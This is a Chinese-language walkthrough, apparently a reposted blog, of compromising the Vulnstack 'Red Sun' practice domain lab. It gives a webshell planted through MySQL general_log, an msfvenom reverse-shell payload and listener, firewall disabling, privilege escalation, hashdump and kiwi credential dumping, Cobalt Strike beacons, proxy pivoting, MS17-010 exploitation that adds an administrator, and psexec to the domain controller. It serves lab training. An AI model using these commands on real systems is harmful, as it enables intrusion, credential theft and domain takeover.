内网域渗透总结——红日靶场①

2023-12-09 06:10
文章标签 总结 靶场 渗透 红日 网域

本文主要是介绍内网域渗透总结——红日靶场①,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

文笔生疏,措辞浅薄,望各位大佬不吝赐教,万分感谢。

一、环境搭建

  • 红日靶场:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/
  • 靶机通用密码:hongrisec@2019
kali+CS
192.168.43.33
win7----admin@123
外网:192.168.43.17
内网:192.168.52.143
可以Ping通外网
通192.168.52.138(win2008)
通192.168.52.141(win2003)
小皮必须是自带的,下载的新版本会导致kali机连接目标失败
问题原理:自行理解
win2008---admin@123
192.168.52.138
win2003---admin@123
192.168.52.141
内网两台不出网win互通
win7开启phpstudy
win11访问80端口得到phpstudy探针

二、外网渗透

信息收集

端口扫描

nmap -A -p -min-rate 10000 192.168.43.17
#发现开启了80,3306端口
#访问发现80端口是php探针
#得到了探针的绝对路径 C:/phpst2016/WWW/l.php

 

目录爆破

dirsearch -u http://192.168.43.17
#出了一些有用信息
#phpMyadmin,phpinfo.php,l.php,

访问phpMyadmin

#发现是一个后台界面
#直接弱口令登录成功
root root

弱口令登录成功

拿到webshell

#通过日志文件写入一句话来获取webshell:
#写入webshell-网站根目录下shell,把日志log改为php
SET global general_log = 'ON'
SET global general_log_file= 'C:/phpst2016/WWW/shell.php'
select "<?php eval($_POST['111']);?>"

​​​

蚁剑连接shell.php

#打开蚁剑
#新建连接
#输入URL:http://192.168.43.17/shell.php
#输入密码:111

信息收集

#发现目标存在yxcms,尝试访问
#在首页发现了后台地址和管理员账密

进入yxcms后台

#网址输入:http://192.168.43.17/yxcms/index.php?r=admin
#admin 
#123456

利用文件上传

蚁剑连接

#小提一下,马子上传了,不知道马子绝对路径怎么办?
#前面我们不是发现phpstudy文件夹下存在beifen.rar
#猜测应该是yxcms的备份文件
#解压之后,可通过查找acomment.php文件来确定文件上传的路径
#/yxcms/protected/apps/default/view/default

​​


#URl:http://192.168.43.17/yxcms/protected/apps/default/view/default/cmsshell.php


至此,已经拿到Webshell

三、后渗透

后渗透阶段,当我们已经将小马上传到web服务器上时,可以用webshell管理工具进行下一步渗透了。

蚁剑终端关闭win7防火墙

#关闭win防火墙
netsh advfirewall set allprofiles state off 
#查看防火墙配置状态
netsh advfirewall show allprofile state

 

msf生成exe并开启监听

#kali创建后门程序
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=192.168.43.33 LPORT=10888 -f exe -o 233.exe #蚁剑上传233.exe
#蚁剑终端运行233.exe#kali开启监听,设置sessions
use exp/multi/handler
set payload windows/x64/meterpreter_reverse_tcp 
set lhost 192.168.43.33
set lport 10888
run

​​

 

拿到win7shell

#尝试提权   
#因为是administrator用户,
#所以很容易提权成功。
shell
getuid
getsystem
getuid

利用msf进行内网信息收集

chcp 65001         ---可解决乱码问题
route print        ---锁定内网C段
net time /domain   ---锁定域控192.168.52.138
net user /domain   ---锁定域内五个账户
ipconfig /all      ---锁定域名
net view           ---锁定域内主机
net group "domain admins" /domain     ---查询域管理员------------
域名:god.org
域内五个用户:Administrator、Guest、liukaifeng01、ligang、krbtgt
域内三台主机:OWA(win2k8)、ROOT-TVI862UBEH(192.168.52.141)、STU1(win7)
域控:OWA(192.168.52.138)
win7内网ip:192.168.52.143
------------

hashdump

hashdump    ---导出本地用户账号密码,该命令的使用需要系统权限。


#CMD5解密
---#hash解密为空:
---#因为当系统为win10或2012R2以上时,
---#默认在内存缓存中禁止保存明文密码,密码字段显示为null,
---#需要修改注册表等用户重新登录后才能成功抓取。

抓取域内账密

#利用msf的kiwi模块+system权限
load kiwi         #加载kiwi模块
help kiwi         #查看kiwi模块的使用
creds_all         #列举所有凭据
creds_kerberos    #列举域内账密 Administrator  admin@123

CS上线win7

#楼楼用的是tools的CS
#CS的基本使用楼楼就不做多说明了
#kali机作为服务端,本地win11为客户端
#服务端启动
./teamserver  192.168.43.33 123456 
# 这里的ip是服务端ip,后续客户端连接此ip登录
win11:
直接运行runcatcs.vbs即可(仅限windows),
其他系统执行:java -jar cat_client.jar client#设置监听器
#生成木马-->artifactHRmsf.exe


#蚁剑上传artfactHRmsf.exe到win7
#运行木马程序
#CS上线成功


#简单提权
elevate   ---#提权成功
sleep 1  ---#设置回弹时间间隔

四、横向渗透

为了让 msf 能访问内网的其他主机,即 52 网段的攻击流量都通过已渗透的这台目标主机(Win7)的meterpreter会话来传递,需要建立socks反向代理。

socket代理

#添加代理
run autoroute -s 192.168.52.0/24  # 添加内网的路由
run autoroute -p                  # 查看路由


#开启代理
background   #将此会话保存为一个sessions
use auxiliary/server/socks_proxy
set VERSION 4a
set SRVPORT 9080
set SRVHOST 127.0.0.1
run
jobs    #运行后挂起一个job


#修改配置文件
#在proxychains的配置文件
vim /etc/proxychains4.conf
#​添加本机的1080端口:
socks4 127.0.0.1 1080
#ping 域内成员

漏洞扫描

#利用nmap对域内主机进行漏洞扫描
nmap --script=vuln 192.168.52.141
nmap --script=vuln 192.168.52.143
nmap --script=vuln 192.168.52.138
#发现都存在ms17_010漏洞

msf利用ms17-010

search ms17-010
use 2
set RHOST 192.168.52.141/143/138
set COMMAND net user
run
#发现除了win7。win2k3,win2k8都可以利用成功

​win7利用失败

尝试给域控win2k8添加管理员

#添加管理员
set  COMMAND net user awy233 awy@233 /add
set COMMAND net user
set COMMAND net localgroup administrators awy233 awy@233 /add
set COMMAND net localgroup administrators
#添加成功,但3389毫无反应

尝试开启域控3389端口

#关闭防火墙
set COMMAND netsh advfirewall set allprofiles state off 
#3389
set COMMAND wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1
set COMMAND REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
#登不上,不知道为什么

五、利用SMB Beacon拿下域控

#使用条件:
#具有 Beacon 的主机必须接受 445 端口上的连接。
#只能链接由同一个 Cobalt Strike 实例管理的 Beacon。
#必须有目标主机的管理员权限或者说是拥有具有管理员权限的凭据。#新建监听器
#payload选择Beacon SMB#右键域控,选择psexec攻击
#设置参数#成功

这篇关于内网域渗透总结——红日靶场①的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!


http://www.chinasem.cn/article/472743

相关文章

Android数据库Room的实际使用过程总结

Android数据库Room的实际使用过程总结

《Android数据库Room的实际使用过程总结》这篇文章主要给大家介绍了关于Android数据库Room的实际使用过程,详细介绍了如何创建实体类、数据访问对象(DAO)和数据库抽象类,需要的朋友可以... 目录前言一、Room的基本使用1.项目配置2.创建实体类(Entity)3.创建数据访问对象(DAO
阅读更多...
Java向kettle8.0传递参数的方式总结

Java向kettle8.0传递参数的方式总结

《Java向kettle8.0传递参数的方式总结》介绍了如何在Kettle中传递参数到转换和作业中,包括设置全局properties、使用TransMeta和JobMeta的parameterValu... 目录1.传递参数到转换中2.传递参数到作业中总结1.传递参数到转换中1.1. 通过设置Trans的
阅读更多...
C# Task Cancellation使用总结

C# Task Cancellation使用总结

《C#TaskCancellation使用总结》本文主要介绍了在使用CancellationTokenSource取消任务时的行为,以及如何使用Task的ContinueWith方法来处理任务的延... 目录C# Task Cancellation总结1、调用cancellationTokenSource.
阅读更多...
HarmonyOS学习(七)——UI(五)常用布局总结

HarmonyOS学习(七)——UI(五)常用布局总结

自适应布局 1.1、线性布局(LinearLayout) 通过线性容器Row和Column实现线性布局。Column容器内的子组件按照垂直方向排列,Row组件中的子组件按照水平方向排列。 属性说明space通过space参数设置主轴上子组件的间距,达到各子组件在排列上的等间距效果alignItems设置子组件在交叉轴上的对齐方式,且在各类尺寸屏幕上表现一致,其中交叉轴为垂直时,取值为Vert
阅读更多...
学习hash总结

学习hash总结

2014/1/29/   最近刚开始学hash,名字很陌生,但是hash的思想却很熟悉,以前早就做过此类的题,但是不知道这就是hash思想而已,说白了hash就是一个映射,往往灵活利用数组的下标来实现算法,hash的作用:1、判重;2、统计次数;
阅读更多...
git使用的说明总结

git使用的说明总结

Git使用说明 下载安装(下载地址) macOS: Git - Downloading macOS Windows: Git - Downloading Windows Linux/Unix: Git (git-scm.com) 创建新仓库 本地创建新仓库:创建新文件夹,进入文件夹目录,执行指令 git init ,用以创建新的git 克隆仓库 执行指令用以创建一个本地仓库的
阅读更多...
BUUCTF靶场[web][极客大挑战 2019]Http、[HCTF 2018]admin

BUUCTF靶场[web][极客大挑战 2019]Http、[HCTF 2018]admin

目录   [web][极客大挑战 2019]Http 考点:Referer协议、UA协议、X-Forwarded-For协议 [web][HCTF 2018]admin 考点:弱密码字典爆破 四种方法:   [web][极客大挑战 2019]Http 考点:Referer协议、UA协议、X-Forwarded-For协议 访问环境 老规矩,我们先查看源代码
阅读更多...
二分最大匹配总结

二分最大匹配总结

HDU 2444  黑白染色 ,二分图判定 const int maxn = 208 ;vector<int> g[maxn] ;int n ;bool vis[maxn] ;int match[maxn] ;;int color[maxn] ;int setcolor(int u , int c){color[u] = c ;for(vector<int>::iter
阅读更多...
整数Hash散列总结

整数Hash散列总结

方法:    step1  :线性探测  step2 散列   当 h(k)位置已经存储有元素的时候,依次探查(h(k)+i) mod S, i=1,2,3…,直到找到空的存储单元为止。其中,S为 数组长度。 HDU 1496   a*x1^2+b*x2^2+c*x3^2+d*x4^2=0 。 x在 [-100,100] 解的个数  const int MaxN = 3000
阅读更多...
状态dp总结

状态dp总结

zoj 3631  N 个数中选若干数和(只能选一次)<=M 的最大值 const int Max_N = 38 ;int a[1<<16] , b[1<<16] , x[Max_N] , e[Max_N] ;void GetNum(int g[] , int n , int s[] , int &m){ int i , j , t ;m = 0 ;for(i = 0 ;
阅读更多...

Copyright China编程 23002807@qq.com

沪ICP备2023033072号-2